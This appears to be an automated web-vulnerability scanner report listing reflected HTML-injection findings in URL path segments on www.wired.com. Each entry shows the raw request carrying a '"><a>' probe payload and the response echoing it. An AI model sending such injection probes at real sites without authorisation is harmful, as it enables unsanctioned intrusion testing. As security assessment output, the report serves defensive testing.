GET /servicesb7e6f"><a>b5e2078d190/feedback/letterstowriter HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29384 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:50 GMT Date: Mon, 22 Nov 2010 01:08:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesb7e6f"><a>b5e2078d190 ss_feedback c_letterstowriter"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c26d"><a>82b196a60f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback3c26d"><a>82b196a60f8/letterstowriter HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29384 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback3c26d"><a>82b196a60f8 c_letterstowriter"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f74"><a>339771d102 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/feedback/letterstowritere3f74"><a>339771d102 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:29 GMT Content-Length: 29382 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_feedback c_letterstowritere3f74"><a>339771d102"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bfa"><a>69123ab5c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services28bfa"><a>69123ab5c3b/newsletters HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:12:20 GMT Date: Mon, 22 Nov 2010 01:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services28bfa"><a>69123ab5c3b ss_newsletters"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f84"><a>3318db1ec93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/newsletters57f84"><a>3318db1ec93 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_newsletters57f84"><a>3318db1ec93"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6749"><a>f428b40f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicese6749"><a>f428b40f49e/press/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Cache-Control: max-age=228 Expires: Mon, 22 Nov 2010 01:13:04 GMT Date: Mon, 22 Nov 2010 01:09:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicese6749"><a>f428b40f49e ss_press"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a33"><a>35aa5f03801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/press55a33"><a>35aa5f03801/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_press55a33"><a>35aa5f03801"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6245"><a>f225322a9f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesc6245"><a>f225322a9f4/privacy/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:48 GMT Date: Mon, 22 Nov 2010 01:08:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesc6245"><a>f225322a9f4 ss_privacy"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174e6"><a>9e726a36c25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/privacy174e6"><a>9e726a36c25/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_privacy174e6"><a>9e726a36c25"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f307"><a>0464dae629d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services4f307"><a>0464dae629d/rss/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29341 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:13:18 GMT Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services4f307"><a>0464dae629d ss_rss"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4dae"><a>7300f743ad1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/rsse4dae"><a>7300f743ad1/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:54 GMT Content-Length: 29341 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_rsse4dae"><a>7300f743ad1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384c1"><a>443f226f7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services384c1"><a>443f226f7b7/sitemap/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:56 GMT Date: Mon, 22 Nov 2010 01:08:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services384c1"><a>443f226f7b7 ss_sitemap"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0c7"><a>5bf57712b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/sitemap7c0c7"><a>5bf57712b5c/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29349 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_sitemap7c0c7"><a>5bf57712b5c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86ba"><a>1fdeb759811 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicese86ba"><a>1fdeb759811/staff/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29345 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Mon, 22 Nov 2010 01:12:48 GMT Date: Mon, 22 Nov 2010 01:09:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicese86ba"><a>1fdeb759811 ss_staff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f7e"><a>3b00f27932b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/staff56f7e"><a>3b00f27932b/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Expires: Mon, 22 Nov 2010 01:09:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:51 GMT Content-Length: 29345 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_staff56f7e"><a>3b00f27932b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20f7"><a>259a66d40d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /servicesf20f7"><a>259a66d40d4/useragreement/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:46 GMT Date: Mon, 22 Nov 2010 01:08:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_servicesf20f7"><a>259a66d40d4 ss_useragreement"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e2b"><a>cf2de19af99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /services/useragreementc8e2b"><a>cf2de19af99/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Expires: Mon, 22 Nov 2010 01:09:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 22 Nov 2010 01:09:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_services ss_useragreementc8e2b"><a>cf2de19af99"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd50"><a>a4511ae9176 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /software9fd50"><a>a4511ae9176 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29196 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:26 GMT Date: Mon, 22 Nov 2010 01:11:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_software9fd50"><a>a4511ae9176"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46357"><a>d3030e2a7bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
